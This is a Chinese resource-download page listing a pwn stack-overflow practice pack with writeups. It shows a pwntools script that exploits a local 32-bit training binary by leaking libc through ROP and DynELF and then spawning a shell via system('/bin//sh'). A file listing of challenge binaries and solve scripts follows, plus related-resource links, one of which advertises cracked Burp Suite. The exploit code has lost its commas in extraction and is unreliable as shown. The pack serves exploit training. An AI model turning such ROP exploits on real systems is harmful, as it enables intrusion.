资源简介
pwn栈溢出练习题目,每题都有writeup.
代码片段和文件信息
# coding:utf-8
# 32位 stackoverflow 写/bin/sh到.bss段,使用DynELF获取system地址
from pwn import *
#context.log_level=‘debug‘
io = process(‘./bof_32‘)
e = ELF(‘./bof_32‘)
libc = ELF(‘/lib32/libc.so.6‘)
#gdb.attach(io ‘b main‘)
_bss = 0x080497E5
def leak(addr):
#addr = e.got[‘write‘]
r = ROP(e)
r.write(1addr8)
r.main()
io.sendline(‘A‘*8 + r.chain())
io.recv(4)
buf = io.recv(8)
log.info(‘%#x -> %s‘%(addr buf))
return buf
d = DynELF(leak elf=e)
system_addr = d.lookup(‘system‘ ‘libc‘)
log.info(‘system: %#x‘ % system_addr)
r = ROP(e)
r.read(0_bss8)
r.call(system_addr[_bss])
io.sendline(‘A‘*8 + r.chain())
io.recv(4)
io.send(‘/bin//sh‘)
io.interactive()
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2019-01-02 05:15 pwn\
文件 2 2018-12-26 06:40 pwn\.gdb_history
目录 0 2018-12-28 07:16 pwn\bof32\
文件 5332 2018-12-26 00:01 pwn\bof32\bof_32
文件 730 2018-12-26 06:42 pwn\bof32\bof_32.py
目录 0 2019-01-01 07:47 pwn\homework\
文件 236 2019-01-01 07:47 pwn\homework\.gdb_history
文件 10456 2019-01-01 07:12 pwn\homework\homework
文件 12 2019-01-01 07:38 pwn\homework\peda-session-homework.txt
文件 27 2019-01-01 07:39 pwn\homework\peda-session-ls.txt
文件 284 2019-01-01 07:45 pwn\homework\solve.py
目录 0 2018-12-28 07:53 pwn\pwn1\
文件 214 2018-12-28 07:53 pwn\pwn1\.gdb_history
文件 2420736 2018-12-28 07:47 pwn\pwn1\core
文件 18 2018-12-28 07:52 pwn\pwn1\peda-session-pwn1.txt
文件 9915 2018-12-28 07:16 pwn\pwn1\pwn1
文件 189 2018-12-28 07:49 pwn\pwn1\solve.py
目录 0 2018-12-28 08:23 pwn\pwn2\
文件 983040 2018-12-28 08:18 pwn\pwn2\core
文件 735740 2018-12-28 07:54 pwn\pwn2\pwn2
文件 301 2018-12-28 08:23 pwn\pwn2\solve.py
目录 0 2018-12-28 19:38 pwn\pwn3\
文件 45 2018-12-28 19:38 pwn\pwn3\.gdb_history
文件 2420736 2018-12-28 19:35 pwn\pwn3\core
文件 18 2018-12-28 19:37 pwn\pwn3\peda-session-pwn3.txt
文件 9989 2018-12-28 19:18 pwn\pwn3\pwn3
文件 195 2018-12-28 19:36 pwn\pwn3\solve.py
目录 0 2018-12-28 23:03 pwn\pwn4\
文件 139 2018-12-28 23:00 pwn\pwn4\.gdb_history
文件 2420736 2018-12-28 22:21 pwn\pwn4\core
文件 18 2018-12-28 22:41 pwn\pwn4\peda-session-pwn4.txt
............此处省略30个文件信息
- 上一篇:Cisco路由器实验手册+路由实验[神码绝密资料]
- 下一篇:psd格式的ps作品
相关资源
- CTF-All-In-OneCTF从入门到放弃pdf
- DirectFB-1.4.3.tar.gz
- CTFcrackTools-V2.2
- Unity结合Kinect2体感开发:KinectForWind
- Kali-Linux-Revealed-1st-edition.
- pwn点云文件
- DirectFB-1.6.1.tar.gz
- Factfulness
- CTF 隐写术经典例题讲解
- SelectFromGallery
- 通过串口控制呼吸灯的频率
- DirectFB-1.3.0.tar.gz
- baby_forensic.zip
- 2020年网鼎杯白虎组赛题.zip
- ctf入门书籍
- CTF抓包改包工具burpsuite专业版破解
- CTF特训营.zip
- CTF AWD工具
- 智能硬件安全
- kinectfusion程序
- i 春秋月刊第六期:Linux pwn 零基础入
- 2019工业信息安全技能大赛试题
- CTF工具大全_2020.08.rar
- CTF杂项隐写工具.zip
- AR9331 固件
- KinFu(不需要安装PCL)
- 常用的500个用户名
- CTF 实战选择题
- ISCC题库.docx
- pwn学习历程.pdf
评论
共有 条评论